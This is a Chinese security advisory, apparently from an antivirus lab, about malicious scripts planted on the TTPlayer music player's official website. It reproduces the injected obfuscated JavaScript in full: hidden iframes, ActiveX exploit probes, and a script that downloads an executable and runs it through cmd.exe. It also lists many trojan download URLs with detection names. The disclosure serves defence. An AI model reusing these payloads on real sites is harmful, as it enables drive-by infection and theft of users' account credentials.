千千静听官方网站挂马事件
查杀见:
12月22日,安天实验室反病毒监测网发现,千千静听官方网站载站(http://
www.ttpl****.com )被黑客植入病毒,用户如果访问该网站,会弹出官方网站
子网(http://wwwct.ttplayer.com/index.php)。系统就会自动从恶意网站
上下载并运行恶意程序。被感染病毒的用户可能被远程控制,盗取用户敏感信息。
该网站被插入如下加密代码:
<SCRIPT>eval("\144\157\143\165\155\145\156\164\56\167\162\151
\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75
\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147
\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167
\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150
\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146
\162\141\155\145\76\42\51");</script><html>
其目的是连接地址:http://aa.lls****.com/ww/new280.htm?016
http://aa.lls****.com/ww/new280.htm?016框架代码:
<iframe src=http://a5.llsging.com/aa
/nini.htm width=6 height=6></iframe>
<iframe src=http://a5.llsging.com/aa
/gege.htm width=6 height=6></iframe>
http://a5.llsging.com/aa/nini.htm加密代码:
<SCRIPT LANGUAGE="JavaScript">
eval("\x2f\x2a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41
\x4e\x47\x55\x41\x47\x45\x3d\x27\x4a\x61\x76\x61\x53
\x63\x72\x69\x70\x74\x27\x3e\x20\x0d\x0a\x66\x75\x6e
\x63\x74\x69\x6f\x6e\x20\x52\x65\x73\x75\x6d\x65\x45
\x72\x72\x6f\x72\x28\x29\x20\x7b\x20\x0d\x0a\x72\x65
\x74\x75\x72\x6e\x20\x74\x72\x75\x65\x3b\x20\x0d\x0a
\x7d\x20\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e
\x65\x72\x72\x6f\x72\x20\x3d\x20\x52\x65\x73\x75\x6d
\x65\x45\x72\x72\x6f\x72\x3b\x20\x0d\x0a\x3c\x2f\x53
\x43\x52\x49\x50\x54\x3e\x2a\x2f\x0d\x0a\x66\x75\x6e
\x63\x74\x69\x6f\x6e\x20\x69\x6e\x69\x74\x28\x29\x7b
\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74
\x65\x28\x29\x7d\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e
\x6c\x6f\x61\x64\x3d\x69\x6e\x69\x74\x3b\x69\x66\x28
\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b
\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f
\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x74\x72\x79\x7b
\x76\x61\x72\x20\x65\x3b\x76\x61\x72\x20\x61\x64\x6f
\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72
\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22
\x6f\x62\x6a\x65\x63\x74\x22\x29\x29\x3b\x61\x64\x6f
\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65
\x28\x22\x63\x6c\x61\x73\x73\x69\x64\x22\x2c\x22\x63
\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36
\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38
\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45
\x33\x36\x22\x29\x3b\x76\x61\x72\x20\x61\x73\x3d\x61
\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65
\x63\x74\x28\x22\x41\x64\x6f\x64\x62\x2e\x53\x74\x72
\x65\x61\x6d\x22\x2c\x22\x22\x29\x7d\x63\x61\x74\x63
\x68\x28\x65\x29\x7b\x7d\x3b\x66\x69\x6e\x61\x6c\x6c
\x79\x7b\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73
\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x65
\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d
\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74
\x54\x69\x6d\x65\x28\x29\x2b\x32\x34\x2a\x36\x30\x2a
\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x64\x6f\x63\x75
\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27
\x69\x65\x70\x6c\x3d\x6f\x72\x65\x72\x3b\x70\x61\x74
\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27
\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d
\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x69\x66\x28
\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45
\x72\x72\x6f\x72\x5d\x22\x29\x7b\x64\x6f\x63\x75\x6d
\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73
\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74
\x70\x3a\x5c\x2f\x5c\x2f\x61\x35\x2e\x6c\x6c\x73\x67
\x69\x6e\x67\x2e\x63\x6f\x6d\x5c\x2f\x61\x61\x5c\x2f
\x31\x31\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69
\x70\x74\x3e\x22\x29\x7d\x65\x6c\x73\x65\x7b\x74\x72
\x79\x7b\x76\x61\x72\x20\x66\x3b\x76\x61\x72\x20\x73
\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69
\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x4d\x50
\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72
\x22\x29\x7d\x63\x61\x74\x63\x68\x28\x66\x29\x7b\x7d
\x3b\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66
\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72
\x72\x6f\x72\x5d\x22\x29\x7b\x64\x6f\x63\x75\x6d\x65
\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63
\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70
\x3a\x5c\x2f\x5c\x2f\x61\x35\x2e\x6c\x6c\x73\x67\x69
\x6e\x67\x2e\x63\x6f\x6d\x5c\x2f\x61\x61\x5c\x2f\x62
\x62\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70
\x74\x3e\x22\x29\x7d\x7d\x74\x72\x79\x7b\x76\x61\x72
\x20\x67\x3b\x76\x61\x72\x20\x70\x70\x73\x3d\x6e\x65
\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65
\x63\x74\x28\x22\x50\x4f\x57\x45\x52\x50\x4c\x41\x59
\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65
\x72\x43\x74\x72\x6c\x2e\x31\x22\x29\x7d\x63\x61\x74
\x63\x68\x28\x67\x29\x7b\x7d\x3b\x66\x69\x6e\x61\x6c
\x6c\x79\x7b\x69\x66\x28\x67\x21\x3d\x22\x5b\x6f\x62
\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29
\x7b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69
\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73
\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61
\x35\x2e\x6c\x6c\x73\x67\x69\x6e\x67\x2e\x63\x6f\x6d
\x5c\x2f\x61\x61\x5c\x2f\x70\x70\x70\x2e\x6a\x73\x3e
\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d
\x7d\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x3b\x76\x61
\x72\x20\x6f\x62\x6a\x3d\x6e\x65\x77\x20\x41\x63\x74
\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x42
\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x22
\x29\x7d\x63\x61\x74\x63\x68\x28\x68\x29\x7b\x7d\x3b
\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x21
\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72
\x6f\x72\x5d\x22\x29\x7b\x6f\x62\x6a\x2e\x44\x6c\x6f
\x61\x64\x44\x53\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f
\x64\x6f\x77\x6e\x2e\x6c\x6c\x73\x67\x69\x6e\x67\x2e
\x63\x6f\x6d\x2f\x62\x62\x2f\x62\x64\x2e\x63\x61\x62
\x22\x2c\x22\x62\x64\x2e\x65\x78\x65\x22\x2c\x30\x29
\x7d\x7d\x69\x66\x28\x66\x3d\x3d\x22\x5b\x6f\x62\x6a
\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x26\x26
\x67\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45
\x72\x72\x6f\x72\x5d\x22\x26\x26\x68\x3d\x3d\x22\x5b
\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d
\x22\x29\x7b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77
\x72\x69\x74\x65\x28\x22\x3c\x69\x66\x72\x61\x6d\x65
\x20\x77\x69\x64\x74\x68\x3d\x27\x31\x30\x27\x20\x68
\x65\x69\x67\x68\x74\x3d\x27\x31\x30\x27\x20\x73\x72
\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x61\x35\x2e
\x6c\x6c\x73\x67\x69\x6e\x67\x2e\x63\x6f\x6d\x2f\x61
\x61\x2f\x62\x66\x2e\x68\x74\x6d\x6c\x27\x3e\x3c\x2f
\x69\x66\x72\x61\x6d\x65\x3e\x22\x29\x7d\x7d\x7d\x7d")
</SCRIPT>
其目的连接:/aa/11.js
http://a5.lls****.com/aa/11.js加密代码:
eval(unescape("var%20h1%3D%22%5Cx68%5Cx74%5Cx74%5Cx
70%5Cx3a%5Cx2f%5Cx2f%5Cx64%5Cx6f%5Cx77%5Cx6e%5Cx2e%
5Cx6c%5Cx6c%5Cx73%5Cx67%5Cx69%5Cx6e%5Cx67%5Cx2e%5Cx
63%5Cx6f%5Cx6d%5Cx2f%5Cx62%5Cx62%5Cx2f%5Cx30%5Cx31%
5Cx34%5Cx2e%5Cx65%5Cx78%5Cx65%22%3Btry%7Bvar%20GLgT
%24%242%3Dado%5B%22%5Cx43%5Cx72%5Cx65%5Cx61%5Cx74%
5Cx65%5Cx4f%5Cx62%5Cx6a%5Cx65%5Cx63%5Cx74%22%5D%28%
22%5Cx4d%5Cx69%5Cx63%5Cx72%5Cx6f%5Cx73%5Cx6f%5Cx66%
5Cx74%5Cx2e%5Cx58%5Cx4d%5Cx4c%5Cx48%5Cx54%5Cx54%5Cx
50%22%2C%22%22%29%3BGLgT%24%242%5B%22%5Cx4f%5Cx70%
5Cx65%5Cx6e%22%5D%28%22%5Cx47%5Cx45%5Cx54%22%2Ch1%
2C0%29%3BGLgT%24%242%5B%22%5Cx53%5Cx65%5Cx6e%5Cx64
%22%5D%28%29%3Bas%5B%22%5Cx74%5Cx79%5Cx70%5Cx65%22
%5D%3D1%3Bas%5B%22%5Cx6f%5Cx70%5Cx65%5Cx6e%22%5D%
28%29%3Bas%5B%22%5Cx77%5Cx72%5Cx69%5Cx74%5Cx65%22%
5D%28GLgT%24%242%5B%22%5Cx52%5Cx65%5Cx73%5Cx70%5Cx
6f%5Cx6e%5Cx73%5Cx65%5Cx42%5Cx6f%5Cx64%5Cx79%22%5D
%29%3Bpath%3D%22%5Cx2e%5Cx2e%5C%5C%5Cx6e%5Cx74%5Cx
75%5Cx73%5Cx65%5Cx72%5Cx2e%5Cx63%5Cx6f%5Cx6d%22%3B
as%5B%22%5Cx73%5Cx61%5Cx76%5Cx65%5Cx74%5Cx6f%5Cx66%
5Cx69%5Cx6c%5Cx65%22%5D%28path%2C2%29%3Bas%5B%22%5C
x63%5Cx6c%5Cx6f%5Cx73%5Cx65%22%5D%28%29%3Bvar%20ni3
%3Dado%5B%22%5Cx63%5Cx72%5Cx65%5Cx61%5Cx74%5Cx65%5C
x6f%5Cx62%5Cx6a%5Cx65%5Cx63%5Cx74%22%5D%28%22%5Cx53
%5Cx68%5Cx65%5Cx6c%5Cx6c%5Cx2e%5Cx41%5Cx70%5Cx70%5C
x6c%5Cx69%5Cx63%5Cx61%5Cx74%5Cx69%5Cx6f%5Cx6e%22%2C
%22%22%29%3Bni3%5B%22%5Cx53%5Cx68%5Cx65%5Cx6c%5Cx6c
%5Cx45%5Cx78%5Cx65%5Cx63%5Cx75%5Cx74%5Cx65%22%5D%28
%22%5Cx63%5Cx6d%5Cx64%5Cx2e%5Cx65%5Cx78%5Cx65%22%2C
%22%5Cx2f%5Cx63%20%22+path%2C%22%22%2C%22%5Cx6f%5Cx
70%5Cx65%5Cx6e%22%2C0%29%7Dcatch%28e%29%7B%7D"))
其目的是下载: http://down.lls****.com/bb/014.exe
http://a5.lls****.com/aa/gege.htm加密代码:
当用户访问http://www.ttplayer.com 时,系统会自动弹出网站的
子网页(http://wwwct.ttplayer.com/index.php)并自动下载以
下病毒文件:
http://down.llsging.com/bb/014.exe
病毒名:( Worm.Win32.Downloader.de) 蠕虫下载者
以上病毒文件为下载者,自动运行后会下载大量的恶意文件!
http://60.190.118.182/down/1.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.kpr) 盗号木马
http://60.190.118.182/down/2.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.isb) 盗号木马
http://60.190.118.182/down/3.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.a) 盗号木马
http://60.190.118.182/down/4.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.aa) 盗号木马
http://60.190.118.15/down/5.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.kry) 盗号木马
http://60.190.118.15/down/6.exe
病毒名:( Trojan-Downloader.Win32.delf.axx) 木马下载者
http://60.190.118.15/down/7.exe
病毒名:( Trojan-Downloader.Win32.delf.axx) 木马下载者
http://60.190.118.15/down/8.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ab) 盗号木马
http://60.190.118.203/down/9.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.lmk) 盗号木马
http://60.190.118.203/down/10.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.ac) 盗号木马
http://60.190.118.203/down/11.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.ad) 盗号木马
http://60.190.118.203/down/12.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.ae) 盗号木马
http://60.190.118.31/down/13.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.af) 盗号木马
http://60.190.118.31/down/14.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.ag) 盗号木马
http://60.190.118.31/down/15.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ah) 盗号木马
http://60.190.118.31/down/16.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.isb) 盗号木马
http://60.190.118.31/down/17.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.aj) 盗号木马
http://60.190.118.71/down/18.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.lqd) 盗号木马
http://60.190.118.71/down/19.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.kaa) 盗号木马
http://60.190.118.71/down/20.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.kaj) 盗号木马
http://60.190.118.71/down/21.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.akd) 盗号木马
http://60.190.118.223/down/22.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.aod) 盗号木马
http://60.190.118.223/down/23.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.ald) 盗号木马
http://60.190.118.223/down/24.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.ldk) 盗号木马
http://60.190.118.223/down/25.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.eld) 盗号木马
http://60.190.118.223/down/26.exe
病毒名:( Trojan-PSW.Win32.OnLineGames.kll) 盗号木马
您的位置: